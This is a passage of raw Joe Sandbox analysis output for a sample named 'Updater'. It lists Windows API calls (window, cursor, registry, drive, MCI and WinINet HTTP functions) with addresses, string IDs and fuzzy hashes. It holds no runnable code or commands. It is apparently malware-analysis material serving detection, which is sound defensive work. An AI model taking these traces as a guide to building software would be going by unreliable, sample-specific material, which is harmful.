                                                                                                                                                    • _wcslen.LIBCMT ref: 00B94B93
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00B94BC7
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C10
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C4A
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C7F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                                                    • Opcode ID: 1189650293bb5494c30aee34ab01deabee2b3bf4d4a7f3b013f7283e2b6f2b4c
                                                                                                                                                    • Instruction ID: 3ccccf7ff993a35c1630dcf4df17000b5db60c18c0e211e880e61c5d4a8f0e56
                                                                                                                                                    • Opcode Fuzzy Hash: 1189650293bb5494c30aee34ab01deabee2b3bf4d4a7f3b013f7283e2b6f2b4c
                                                                                                                                                    • Instruction Fuzzy Hash: 4C6190326042519FCB10EF25D841B6AB7F1EF98714F1085BCF85997291EB71EE06CB82
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                    • API String ID: 176396367-909552448
                                                                                                                                                    • Opcode ID: 54ce62dd2d0c6fcc6c12077b82bc35f4d54890b40503649884763aae6d7bbc14
                                                                                                                                                    • Instruction ID: ed07515cda5bb210a0db9e855761d4700ca7950db8a690e70804dc1b8e52d1d6
                                                                                                                                                    • Opcode Fuzzy Hash: 54ce62dd2d0c6fcc6c12077b82bc35f4d54890b40503649884763aae6d7bbc14
                                                                                                                                                    • Instruction Fuzzy Hash: 4551B333E0855247CB24AF28A9112BA33E1EB76708F5441E9EC1B1BB58EF31AD469781
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00B86A0C
                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B86A1D
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B86A35
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B86A4B
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B86A51
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B86A61
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B86A67
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B86A88
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 00B86AA1
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B86AAA
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B86B0A
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B86B48
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B86B4F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$MessageSendText$Rect$DesktopIconLoad_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2606896325-0
                                                                                                                                                    • Opcode ID: e8f0a776a279aa43e01f9a682f6457620e95ebddda690a59911d6cd96d9bc66c
                                                                                                                                                    • Instruction ID: 1a7e46eb375102b7fa5654ddb145f1a8e5887c344dd299ccdc7890aff56095d6
                                                                                                                                                    • Opcode Fuzzy Hash: e8f0a776a279aa43e01f9a682f6457620e95ebddda690a59911d6cd96d9bc66c
                                                                                                                                                    • Instruction Fuzzy Hash: F9718F71A00609AFDB24EFA8CD86BAEBBF5FF48704F104558E546A31A0EB75ED40CB10
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00BA09F0
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00BA09FB
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00BA0A06
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00BA0A11
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00BA0A1C
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00BA0A27
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00BA0A32
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00BA0A3D
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00BA0A48
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00BA0A53
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00BA0A5E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00BA0A69
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00BA0A74
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00BA0A7F
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00BA0A8A
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00BA0A95
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00BA0AA5
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00BA0AE7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                    • Opcode ID: ef5fc1b8e7f888cb788d3d6bf54e51931bb9ac87db46abf77ad80f474c5daca2
                                                                                                                                                    • Instruction ID: ed766e677cbc720eb5293bd915decb8c6900246175d6d899ca2f2684209ca08e
                                                                                                                                                    • Opcode Fuzzy Hash: ef5fc1b8e7f888cb788d3d6bf54e51931bb9ac87db46abf77ad80f474c5daca2
                                                                                                                                                    • Instruction Fuzzy Hash: B2415470D083196ADB10DFBA8C85D5EBFE8FF04754F50456AE11CE7281DA789901CE91
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                    • API String ID: 176396367-1603158881
                                                                                                                                                    • Opcode ID: 076743b3bd31548001306a2de790912560128820e988beed2b758b9b217dbfbe
                                                                                                                                                    • Instruction ID: 49fe128ad2595a60e431c3487c01230d98fc767d8321de50b4ea5d7b2a699582
                                                                                                                                                    • Opcode Fuzzy Hash: 076743b3bd31548001306a2de790912560128820e988beed2b758b9b217dbfbe
                                                                                                                                                    • Instruction Fuzzy Hash: 6FD1A471E001179BCB18EFA4D481BEEB7F5FF15304F5081A9E85AA7221EB30AE59DB50
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                    • Opcode ID: 38e864b3b3b54cac7c7bf1008ffd845c5a05f1f46b95cb4cebe755eff91a018e
                                                                                                                                                    • Instruction ID: 364d3f1ba5acf1cfd0b3f59e5de3b00a2cf77b7fb7d5ff58050c77a8cec189a6
                                                                                                                                                    • Opcode Fuzzy Hash: 38e864b3b3b54cac7c7bf1008ffd845c5a05f1f46b95cb4cebe755eff91a018e
                                                                                                                                                    • Instruction Fuzzy Hash: F19108369482209FCB25DF28D881B6AB7E4EF50704F1444FCF85A6B251EB71DD46CB92
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00B4073A
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B4074B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B40761
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B4076F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B4077D
                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B407D3
                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00B407E8
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00BF16CC,00000007), ref: 00B407F3
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B40803
                                                                                                                                                    Strings
                                                                                                                                                    • kernel32.dll, xrefs: 00B40746
                                                                                                                                                    • InitializeConditionVariable, xrefs: 00B4075B
                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B40735
                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00B40767
                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00B40775
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleProc$Module$CloseCreateCriticalDeleteEventSection___scrt_fastfail
                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                    • API String ID: 2238755874-1714406822
                                                                                                                                                    • Opcode ID: db79a7c56510a1ddeb36e8970129066e0ae13577c9ba5416cf5c81923cd39217
                                                                                                                                                    • Instruction ID: a5b91dc16e8a5a463fc586077dbc47e1a479160680811cc4e3bc2861920af8ef
                                                                                                                                                    • Opcode Fuzzy Hash: db79a7c56510a1ddeb36e8970129066e0ae13577c9ba5416cf5c81923cd39217
                                                                                                                                                    • Instruction Fuzzy Hash: 3A21EB72A61311BBD72077BD9C49F3A26D8DB44B51F090AB5FE01E71A0DEB4DD00DA91
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4CB9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BA4CCB
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00BA4CF0
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00BA4D3C
                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA4DA6
                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00BA4E60
                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BA4EC6
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00BA4EF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                    • Opcode ID: bdc9fc3704a0cbb4d937d0fc93df8f9836f2adf1b5782b28c6a057d339f9fb18
                                                                                                                                                    • Instruction ID: b1dd6765dd2204e9553bfe1f58bf5fb08eaeb881898150462dccd495165c9b7f
                                                                                                                                                    • Opcode Fuzzy Hash: bdc9fc3704a0cbb4d937d0fc93df8f9836f2adf1b5782b28c6a057d339f9fb18
                                                                                                                                                    • Instruction Fuzzy Hash: 01123B75A04105EFDB24CF54C884EAEB7F5FF86314F248098E909AB251DB71EE46CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 00B77E4B
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 00B77EFB
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B77F3F
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00B77F48
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,00000000,00000000,00000000,?,?,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 00B77F5B
                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B77F67
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                    • Opcode ID: cf66bd852e61ab1837afa1555b9f7e82f77db21bb3ea77cb88e723afe7b96d27
                                                                                                                                                    • Instruction ID: 3db2723d49746921f6a97266cda8e2f0d4aeebed44e1d9360333c58cdd2015e2
                                                                                                                                                    • Opcode Fuzzy Hash: cf66bd852e61ab1837afa1555b9f7e82f77db21bb3ea77cb88e723afe7b96d27
                                                                                                                                                    • Instruction Fuzzy Hash: FD71C5B1688215BBEB259F24DC89FAABFE8FF04724F204295F528661E1CBB15D10C790
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00BB77A8
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BB781C
                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BB783E
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB7851
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00BB7873
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B20000,00000000), ref: 00BB78A4
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB78BD
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00BB78D6
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00BB78DD
                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BB78F5
                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BB790D
                                                                                                                                                      • Part of subcall function 00B34E23: GetWindowLongW.USER32(?,000000EB), ref: 00B34E34
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                    • Opcode ID: b5acacd60dc32a6af87d2bc058624ac80b31ce6075dc21fb8c08b1d8e8546255
                                                                                                                                                    • Instruction ID: 33ed592c1b1b1291c18fd6735ad6c8b48db5128d14835e3e1f8bf40d133736fc
                                                                                                                                                    • Opcode Fuzzy Hash: b5acacd60dc32a6af87d2bc058624ac80b31ce6075dc21fb8c08b1d8e8546255
                                                                                                                                                    • Instruction Fuzzy Hash: 07718B70144245AFD725CF28CC48FBA77E9FB88304F1449ADF989972A1DBB4EA11CB61
                                                                                                                                                    APIs
                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9CF97
                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9CFAA
                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9CFBE
                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B9CFD7
                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B9D01A
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B9D030
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9D03B
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9D06B
                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9D0C3
                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9D0D7
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B9D0E2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                    • Opcode ID: af0f5a1094d02ddd649df09f331f1a9c7cdbb179afd97334794a3e1038d99a13
                                                                                                                                                    • Instruction ID: 2759d438684af0853e213e4071a721845bd3dbbf7b3eded7eefdb95b499dc6c5
                                                                                                                                                    • Opcode Fuzzy Hash: af0f5a1094d02ddd649df09f331f1a9c7cdbb179afd97334794a3e1038d99a13
                                                                                                                                                    • Instruction Fuzzy Hash: EC515BB1500608BFDB219F62C888BAABBFCFF08354F10456AF94597250EB78DD059B61
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00BB8F69
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00BB8F80
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00BB8F8B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BB8F98
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BB8FA1
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BB8FB0
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BB8FB9
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BB8FC0
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BB8FD1
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC0BEC,?), ref: 00BB8FEA
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BB8FFA
                                                                                                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00BB901E
                                                                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00BB904E
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00BB9076
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BB908C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
